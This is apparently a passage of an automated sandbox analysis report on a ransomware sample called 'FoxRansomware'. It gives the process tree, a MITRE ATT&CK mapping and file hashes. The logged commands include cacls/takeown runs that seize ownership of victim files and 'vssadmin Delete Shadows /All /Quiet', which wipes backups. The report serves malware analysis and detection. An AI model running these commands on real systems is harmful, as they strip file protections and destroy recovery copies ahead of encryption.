- Loads dropped DLL
PID:876 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵
- Loads dropped DLL
PID:2452 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:2560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
PID:2068 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:3892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
PID:2060 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:2388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
PID:3616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
PID:300
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2788
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8CEE9AA9-CDB6-4C68-9D55-C293650D091F} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]1⤵PID:3356
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat"2⤵PID:3480
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:3992
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C1⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "forms_super.gif" -nobanner1⤵
- Executes dropped EXE
PID:596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "resource.xml" -nobanner1⤵
- Executes dropped EXE
PID:1048
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "review_browser.gif" -nobanner1⤵
- Executes dropped EXE
PID:1948
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD57dd326252c9a1ec4a07fb92ac808a9df
SHA124231eb774e788fee01d3e848984cb686b661eef
SHA25649ce694d80cd4586c47cf3de2fe6ed6526277d2fb0855049cd26ec0dd43eb2c4
SHA512461e71f1829b3ff7818f1b8110ca32de7bbc593dc5cecf70dc9cea6eb6988804e41668725e2c9ed3757b36ee97b3a98b58da86adc0c9af8c7d3952e0ee460a9c
-
Filesize
1.2MB
MD5268360527625d09e747d9f7ab1f84da5
SHA109772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA25642f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA51207fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
Filesize
14B
MD5c74dacdd9331a6698efffe81ff66ac08
SHA179e8ce4bb5cc2436e95fad4a74a31aee7aa63043
SHA25682ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
SHA51224620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
-
Filesize
134B
MD5b3ec6680d872880429e3ffba79db6ec8
SHA1e193f521ae00f0a816c16ad35e6b8717f707c370
SHA256db4b71020b0d92359709e856cb9bfda0a1f4de5e4e462893d9adc5cd6da35d17
SHA5128e847bf72fc7ce5e3365045e3c5812f7b8addee25bca38a86facb3490a7579228bf47aa14d884f14095f279d8ce487c82e7b69fee4378cf30953a5c700fb2435
-
Filesize
425B
MD5f5a3ebf92d9b2900cd8808f3337ac8c8
SHA103484a077733a001235dfd582965067145903b15
SHA2562c5108fa26eadc09f4ed3b421b85ac0d46aad3c41eb4fc86b7bafa41205af4d5
SHA512b05cc43b5cc51d6ba4d1ab61c883c923c9ad6703e2f2bc1fbb2940ea238061fa2e380dd9b378d3a6efe6d5c72fd4d85c5e565d9da3ab7afb9e8325cc3e6462fa
-
Filesize
8KB
MD5f1d4bfe7c4f1a6fab55f6b0940fd01eb
SHA1c2aac49fdd5d39bac29cfc9c1cea2003f2c7078e
SHA256b98fc82db3dca7c848febd7fec99ce951b0d5c953679f8b9dc10fffda8fb44f1
SHA5123b8582593a544ced6305abb8c7f2768f1a3928fa04b47fd6a4da2a20c9e87fb6bfa731b5333f61d1f92a0e3cc532b58be203076949a379f9761bc43cfbb9fc30
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
64KB
MD539384617afb7b1a4cd7b11d998292e13
SHA187689603aebba6b353bbca3d5a038c0e8e59fd4c
SHA256b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa
SHA51252be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7
-
Filesize
226B
MD51ea00804ef70f0801cbaa06c41199a36
SHA1cf5ff496864f4a62cd7a2cda0cfdd3f50aa27046
SHA256249430ced89f1e72331e7cffacf545ec8098c8de495373a5216e213620a19307
SHA512f2e401709bb3db26de15758fa9fcd47c078176829d3fdead150c920cfb8e3ef092e808ce6299043eb5c02a5edaaf7dc69908fb82a94fdc9b3092cb79632da4f1
-
Filesize
260B
MD5670c24fc8d7e514e971a184129cc4796
SHA1e9009664ac70fc2c49fbbc903f743c405f0b96d6
SHA2560f0d35ba87b390da1a080ed8a60bd1ddb7b811169a9ce2f9cc7604153233c2ef
SHA512e75bfb436b43a005ea4751cea0b7f60de1e9cc747dcd5e4d993184e10d3ac4b0d391574bc20da7401d4f1b1122073db163dc19577222f8fe9f9b464eaefe974e
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6